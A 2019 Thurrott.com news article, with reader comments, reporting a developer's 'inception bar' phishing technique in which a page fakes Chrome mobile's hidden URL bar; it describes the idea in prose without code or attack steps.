Chrome Mobile Susceptible to Phishing Attacks

Paul Thurrott
Apr 29, 2019
5

A software developer has identified a simple exploit in the mobile version of Google Chrome that can be used for phishing attacks. He calls it “the inception bar.”

“In Chrome for mobile, when the user scrolls down, the browser hides the URL bar and hands the URL bar’s screen space to the web page,” developer James Fisher explains. “Because the user associates this screen space with ‘trustworthy browser UI,’ a phishing site can then use it to pose as a different site, by displaying its own fake URL bar – the inception bar!”

Windows Intelligence In Your Inbox

Sign up for our new free newsletter to get three time-saving tips each Friday — and get free copies of Paul Thurrott's Windows 11 and Windows 10 Field Guides (normally $9.99) as a special welcome gift!

"*" indicates required fields

As Mr. Fisher explains it, that behavior is bad enough. But thanks to the programmable nature of Chrome mobile, hackers could also trick the browser into never re-displaying the real address bar, which typically happens if the user scrolls back up the page or scrolls to the top of the page.

That behavior explains Fisher’s name for the hack: In the movie Inception, characters could be robbed while dreaming. “Like a dream in Inception, the user believes they’re in their own browser, but they’re actually in a browser within their browser,” he explains. “The user thinks they’re scrolling up in the page, but in fact, they’re only scrolling up in the scroll jail [in which the real address bar is never displayed].”

In case it’s not obvious, a fake address bar could be styled to look like a secure website for a bank or other service, and fool users to enter private data like user names and passwords. Fisher says he’s not sure how a user could protect themselves from this flaw, and he views it, correctly, as a security flaw in Chrome mobile.

Google has not yet publicly commented on this issue. And, yes, I assume the new Chromium-based Edge is susceptible to this type of attack as well.

Tagged with

Chrome

Please check our Community Guidelines before commenting

Conversation 5 comments

wright_is
Premium Member
29 April, 2019 - 8:59 am

Chromium Edge won't be susceptible. Edge on Android or iOS, along with Firefox on mobile and most other mobile browsers, would be susceptible. That said, they would probably have the advantage that the phishing site would be programmed to look like Chrome for Android and looks different enough that a savvy user would notice that the inception bar doesn't look like their browser's normal title bar.

Log in to Reply
chrisrut
Premium Member
29 April, 2019 - 11:35 am

This is reminiscent of tactics used by the USAF's "penetration squads" back in the 60s and 70s, which hacked commercial systems in order to learn how to make them secure. "Fake log in screens" were used to great effect: so said my boss at Gemini Computers, who ran said programs, which resulted in the "Orange Book", and the NCSC. Human Factors views the user as the most important component in any system. Security views that same user as the weakest link.

Log in to Reply
IanYates82
Premium Member
29 April, 2019 - 5:18 pm

I like how he even has 26 tabs open in the demo. It's a good fake. Except that 26 tabs was far too low ?. So many things pop open a browser tab that I interact with and then never return to

Log in to Reply
clhodappp
Premium Member
30 April, 2019 - 4:31 am

I've been wondering if something like this were possible ever since I discovered that pages could be made to force you to scroll back to the top to see the url bar. Chrome needs to either not let pages do this or at least make some kind of reliable gesture to bring the top controls back.

Log in to Reply
dontbe evil

17 May, 2019 - 7:25 am

what a surprise /s

Log in to Reply

About author

Paul Thurrott

Paul Thurrott is an award-winning technology journalist and blogger with over 25 years of industry experience and the author of 30 books. He is the owner of Thurrott.com and the host of three tech podcasts: Windows Weekly with Leo Laporte and Richard Campbell, Hands-On Windows, and First Ring Daily with Brad Sams. He was formerly the senior technology analyst at Windows IT Pro and the creator of the SuperSite for Windows from 1999 to 2014 and the Major Domo of Thurrott.com while at BWW Media Group from 2015 to 2023. You can reach Paul via email, Twitter or Mastodon.

View Articles

Currently on Forums
Visit the forums
- Ask Paul for this Friday, April 19
  Posted by Paul Thurrott
  
  6
  comments
- Questions for 4 / 19?
  Posted by Brad Sams
  
  3
  comments
- What does Microsoft know that we don’t?
  Posted by Sarah Duguay
  
  3
  comments
- OneDrive decided to break itself
  Posted by jimchamplin
  
  8
  comments
Podcasts
Podcast Hub
- First Ring Daily 1585: Extensioned
  
  Aired on April 18, 2024 by Brad Sams with 0 Comments
- Windows Weekly 877: The Tiger in the Grass
  
  Aired on April 18, 2024 by Paul Thurrott with 1 Comment
- First Ring Daily 1584: Did Copilot Do That?
  
  Aired on April 17, 2024 by Brad Sams with 1 Comment
- First Ring Daily 1583: The Plumbing
  
  Aired on April 16, 2024 by Brad Sams with 1 Comment
Join the crowd where the love of tech is real - become a Thurrott Premium Member today!

Explore Premium Benefits

Chrome Mobile Susceptible to Phishing Attacks

Windows Intelligence In Your Inbox

Tagged with

Share post

Conversation 5 comments

Ask Paul for this Friday, April 19

Questions for 4 / 19?

What does Microsoft know that we don’t?

OneDrive decided to break itself

First Ring Daily 1585: Extensioned

Windows Weekly 877: The Tiger in the Grass

First Ring Daily 1584: Did Copilot Do That?

First Ring Daily 1583: The Plumbing

Windows Intelligence In Your Inbox

Sections

About Thurrott

Contact

Our Other Sites

Subscribe